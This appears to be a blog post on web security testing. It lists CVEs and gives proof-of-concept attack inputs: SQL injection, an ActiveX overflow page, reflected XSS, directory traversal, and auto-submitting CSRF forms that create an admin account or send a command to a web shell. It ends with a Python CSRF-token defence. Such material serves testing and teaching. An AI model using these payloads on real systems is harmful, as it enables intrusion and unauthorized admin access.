Common real-world website vulnerability CVEs and attack test examples

    This article introduces several real-world website vulnerability cases together with sample test programs. The samples all come from vulnerabilities that actually occurred in shipped products. The author uses them to show how, during security testing, these test techniques can be turned into test cases so that a product does not ship with the same weaknesses.

    Common website CVEs

    • File path traversal: CVE-2013-2678
    • Cross-site scripting (reflected): CVE-2013-2679
    • Cleartext submission of password: CVE-2013-2680
    • Password field with autocomplete enabled: CVE-2013-2681
    • Frameable response (clickjacking): CVE-2013-2682
    • Private IP addresses disclosed: CVE-2013-2683
    • HTML does not specify charset: CVE-2013-2684

    Blind SQL injection test example

    /iptm/PRTestCreation.do?RequestSource=dashboard&MACs=&CCMs='waitfor%20delay'0:0:20'--&Extns=&IPs=

    ActiveX control buffer overflow test example

    ProductName: PlayerPT ActiveX Control Module
    File version: 1.0.0.15
    Binary path: C:\WINDOWS\system32\PlayerPT.ocx
    CLSID: {9E065E4A-BD9D-4547-8F90-985DC62A5591}
    <!-- saved from url=(0014)about:internet -->
    <HTML>
    <!-- instantiate the control by its CLSID so the script can reach it as 'obj' -->
    <object classid='clsid:9E065E4A-BD9D-4547-8F90-985DC62A5591' id='obj'></object>
    <script>
    // build an oversized string (13999 x 4 characters) for the fifth argument of SetSource
    var x = "";
    for (var i = 0; i < 13999; i++) {
        x = x + "aaaa";
    }
    obj.SetSource("", "", "", "", x);
    </script>
    </HTML>

    Reflected XSS test examples

    /iptm/advancedfind.do?extn=73fcb</script><script>alert(1)</script>23fbe43447
    /iptm/ddv.do?deviceInstanceName=f3806"%3balert(1)//9b92b050cf5&deviceCapability=deviceCap
    http://X.X.X.X/Web/SA2/ScriptList.do?gui_pagenotableData=><script>alert(42)</script>

    Directory traversal test example

    http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..\boot.ini

    CSRF attack test examples

    Does using HTTP POST mean a site cannot be hit by CSRF? That myth is wrong!

    Look at the following "real" examples: CSRF can even be used to execute commands and to create system administrator accounts.

    CSRF and JavaScript attacks actually share the top spot in web attack severity.

    <html lang="en">
    <head>
    <title>CSRF Exploit to Create New Administrator Account</title>
    </head>
    <body>
    <form action="http://localhost/testlink_1_9_14/lib/usermanagement/usersEdit.php"
    id="formid" method="post">
    <input type="hidden" name="CSRFName" value="" />
    <input type="hidden" name="CSRFToken" value="" />
    <input type="hidden" name="user_id" value="" />
    <input type="hidden" name="user_login" value="" />
    <input type="hidden" name="login" value="new_admin" />
    <input type="hidden" name="firstName" value="new_administrator_fname" />
    <input type="hidden" name="lastName" value="new_administrator_lname" />
    <input type="hidden" name="password" value="new_administrator_password" />
    <input type="hidden" name="emailAddress" value="new_administrator@admin.com" />
    <input type="hidden" name="rights_id" value="8" />
    <input type="hidden" name="locale" value="en_GB" />
    <input type="hidden" name="authentication" value="" />
    <input type="hidden" name="user_is_active" value="on" />
    <input type="hidden" name="doAction" value="doCreate" />
    <input type="hidden" name="do_update" value="Save" />
    </form>
    <script>
    document.getElementById('formid').submit();
    </script>
    </body>
    </html>
     
    <html>
    <body>
    <form id='ABYSMALGODS' action='http://localhost/b374k-master/myshell.php?run=convert,database,info,mail,network,processes' method='post'>
    <input id='cmd' type='text' name='terminalInput' value='calc.exe' />
    </form>
    <script>document.getElementById('ABYSMALGODS').submit()</script>
    </body>
    </html>
    <html>
        <body onload="javascript:document.forms[0].submit()">
        <form name="f" action="http://192.168.0.8/wordpress/wp-admin/admin.php?page=easy_polls&action=add" method="post">
        <input type="hidden" name="action" value="p_add" />
        <input type="hidden" name="p_ques" value="<script>alert(document.cookie)</script>" />
        <input type="hidden" name="p_start" id="p_start" value="2015-11-18 22:55:52" required="required" />
        <input type="hidden" name="p_end" id="p_end" value="2015-11-20 09:00:00" required="required" />
        <input type="submit" name="submit" value="Submit" class="button" />
        </form>
        </body>
    </html>
    This is a CSRF testing sample for POST. The POST hidden variables listed below may change based on the target website.

    <html>
      <body>
        <form action="http://[TARGET]/admin/ekleadmin2.php" method="POST">
          <input type="hidden" name="kadi" value="knockout" />
          <input type="hidden" name="sifre" value="password" />
          <input type="hidden" name="Submit" value="Exploit!" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>
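What the server side of these POST endpoints is missing, shown as an added example that is not from the original post or from any of the products named above: a minimal synchronizer-token check, with an Origin/Referer check as a second layer, which rejects an auto-submitted form whose CSRFToken field is blank (as in the TestLink sample) while accepting the site's own form. CsrfGuard, check_post_request and ALLOWED_ORIGIN are hypothetical names.

```python
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

# Constructed illustration of the synchronizer-token pattern for a cookie-
# authenticated POST endpoint. CsrfGuard and check_post_request are
# hypothetical names, not TestLink's or any other project's code.

ALLOWED_ORIGIN = "http://localhost"   # constructed: the site's own origin


class CsrfGuard:
    """Per-session anti-CSRF tokens, kept server-side (in-memory for the demo)."""

    def __init__(self):
        self._tokens = {}

    def issue(self, session_id):
        # A fresh, unguessable token bound to the session; the site embeds it
        # in its own forms, so a third-party page cannot know it.
        token = secrets.token_urlsafe(32)
        self._tokens[session_id] = token
        return token

    def verify(self, session_id, submitted):
        expected = self._tokens.get(session_id)
        if not expected or not submitted:
            return False        # a blank or missing token is never valid
        # constant-time comparison; both values are ASCII
        return hmac.compare_digest(expected.encode(), submitted.encode())


def check_post_request(guard, session_id, headers, body):
    """Return (accepted, reason). Being a POST with a valid session cookie is not enough."""
    # Layer 1: Origin (or Referer) must be our own site whenever the browser sends it.
    origin = headers.get("Origin") or headers.get("Referer", "")
    if origin:
        parts = urlsplit(origin)
        if f"{parts.scheme}://{parts.netloc}" != ALLOWED_ORIGIN:
            return False, "cross-site origin"
    # Layer 2: the form body must carry the token issued to this session.
    fields = parse_qs(body, keep_blank_values=True)
    token = fields.get("CSRFToken", [""])[0]
    if not guard.verify(session_id, token):
        return False, "missing or invalid CSRFToken"
    return True, "ok"
```

The blank CSRFName/CSRFToken fields in the TestLink form above are exactly what the second layer rejects; the first layer catches the cross-site submission even when a token field is present.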

    Posted by Tony @ 10:15 pm
